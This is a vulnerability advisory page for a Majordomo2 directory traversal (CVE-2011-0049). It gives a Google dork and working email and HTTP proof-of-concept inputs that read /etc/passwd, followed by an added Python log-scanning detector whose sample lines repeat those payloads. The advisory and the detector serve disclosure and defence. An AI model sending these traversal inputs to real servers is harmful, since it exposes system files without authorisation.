
Majordomo2 20110121 Directory Traversal

Published: 02 Feb 2011 00:00:00 | Reported by: Michael Brooks | Type: packetstorm | Source: packetstormsecurity.com

Majordomo2 20110121 Directory Traversal vulnerability

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| 0day.today | Majordomo2 - Directory Traversal (SMTP/HTTP) | 3 Feb 2011 00:00 | zdt |
| Circl | CVE-2011-0049 | 3 Feb 2011 00:00 | circl |
| CVE | CVE-2011-0049 | 4 Feb 2011 00:00 | cve |
| Cvelist | CVE-2011-0049 | 4 Feb 2011 00:00 | cvelist |
| d2 | DSquare Exploit Pack: D2SEC_MAJORDOMO | 4 Feb 2011 01:00 | d2 |
| Dsquare | Majordomo 2 File Disclosure | 27 Apr 2012 00:00 | dsquare |
| Exploit DB | Majordomo2 - 'SMTP/HTTP' Directory Traversal | 3 Feb 2011 00:00 | exploitdb |
| exploitpack | Majordomo2 - SMTPHTTP Directory Traversal | 3 Feb 2011 00:00 | exploitpack |
| Tenable Nessus | Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access | 16 Feb 2011 00:00 | nessus |
| Metasploit | Majordomo2 _list_file_get() Directory Traversal | 12 Mar 2011 16:38 | metasploit |

`Original Advisory: https://sitewat.ch/en/Advisory/View/1  
Credit: Michael Brooks (https://sitewat.ch)  
Vulnerability: Directory Traversal  
Software: Majordomo2  
Identifier: CVE-2011-0049  
Vendor: http://www.mj2.org/  
Affected Build: 20110121 and prior  
Download:  
http://ftp.mj2.org/pub/mj2/snapshots/2011-01/majordomo-20110121.tar.gz  
Google dork: inurl:mj_wwwusr  
  
Special thanks to Dave Miller, Reed Loden and the rest of the Mozilla  
security team for handling the issue.  
  
This vulnerability is exploitable via ALL of Majordomo2's interfaces. *Including e-mail*.  
Send an email to majordomo's mail interface (for example: [email protected]) with the body of the message as follows:  
help ../../../../../../../../../../../../../etc/passwd  
  
I'll give you one guess as to the contents of the response email ;).  
  
PoC for HTTP:  
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd  
`
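
For defenders reviewing a Majordomo2 host, the following is an added detection example; it is not part of the original advisory or of Majordomo2. It flags `mj_wwwusr` requests whose `extra` parameter carries a `..` path segment and `help` mail commands whose topic does the same. The function names, the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request target in a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def has_traversal(value: str) -> bool:
    """True if value, once fully URL-decoded, contains a '..' path segment."""
    prev = None
    while prev != value:               # normalise nested percent-encoding
        prev, value = value, unquote(value)
    return ".." in re.split(r"[/\\]+", value)

def suspicious_http(line: str) -> bool:
    """Flag mj_wwwusr requests whose 'extra' parameter carries a traversal."""
    m = REQUEST_RE.search(line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    if not url.path.endswith("/mj_wwwusr"):
        return False
    params = parse_qs(url.query, keep_blank_values=True)
    return any(has_traversal(v) for v in params.get("extra", []))

def suspicious_mail_command(body_line: str) -> bool:
    """Flag a 'help <topic>' command line whose topic carries a traversal."""
    parts = body_line.strip().split(None, 1)
    return (len(parts) == 2 and parts[0].lower() == "help"
            and has_traversal(parts[1]))

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2011:10:00:00 +0000] "GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1" 200 1532',
    '192.0.2.11 - - [03/Feb/2011:10:00:05 +0000] "GET /cgi-bin/mj_wwwusr?list=GLOBAL&func=help&extra=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1532',
    '192.0.2.12 - - [03/Feb/2011:10:00:09 +0000] "GET /cgi-bin/mj_wwwusr?list=GLOBAL&func=help&extra=subscribe HTTP/1.1" 200 812',
]

def scan(lines):
    """Return one boolean per log line: True where the request looks suspicious."""
    return [suspicious_http(line) for line in lines]

if __name__ == "__main__":
    for line, hit in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print("ALERT" if hit else "ok   ", line[:90])
```

A hit in historical logs on a build of 20110121 or earlier is a reason to treat files readable by the Majordomo2 process as disclosed.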
